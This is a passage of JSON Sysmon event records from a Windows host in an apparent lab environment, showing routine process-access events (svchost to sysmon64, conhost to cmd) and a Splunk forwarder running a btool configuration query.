07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1794,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1795,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1796,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1797,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1798,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nTargetProcessId: 3076\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-0010E3900300}","TargetProcessId":"3076","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1799,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.403\r\nProcessGuid: {41C8662E-1F75-5F25-0000-001063920300}\r\nProcessId: 2668\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: btool  server list kvstore --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nParentProcessId: 3076\r\nParentImage: C:\\Windows\\System32\\cmd.exe\r\nParentCommandLine: C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.403","ProcessGuid":"{41C8662E-1F75-5F25-0000-001063920300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"btool  server list kvstore --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1F75-5F25-0000-0010E3900300}","ParentProcessId":"3076","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentCommandLine":"C:\\Windows\\system32\\cmd.exe /c btool server list kvstore --no-log","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1800,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F75-5F25-0000-0010E3900300}\r\nSourceProcessId: 3076\r\nSourceThreadId: 3448\r\nSourceImage: C:\\Windows\\system32\\cmd.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001063920300}\r\nTargetProcessId: 2668\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F75-5F25-0000-0010E3900300}","SourceProcessId":"3076","SourceThreadId":"3448","SourceImage":"C:\\Windows\\system32\\cmd.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001063920300}","TargetProcessId":"2668","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\cmd.exe+f1e1|C:\\Windows\\system32\\cmd.exe+11a37|C:\\Windows\\system32\\cmd.exe+cb0d|C:\\Windows\\system32\\cmd.exe+c295|C:\\Windows\\system32\\cmd.exe+f916|C:\\Windows\\system32\\cmd.exe+1510d|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1801,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1F75-5F25-0000-001063920300}\r\nTargetProcessId: 2668\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1F75-5F25-0000-001063920300}","TargetProcessId":"2668","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:25","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1802,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:25.392\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:25.392","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows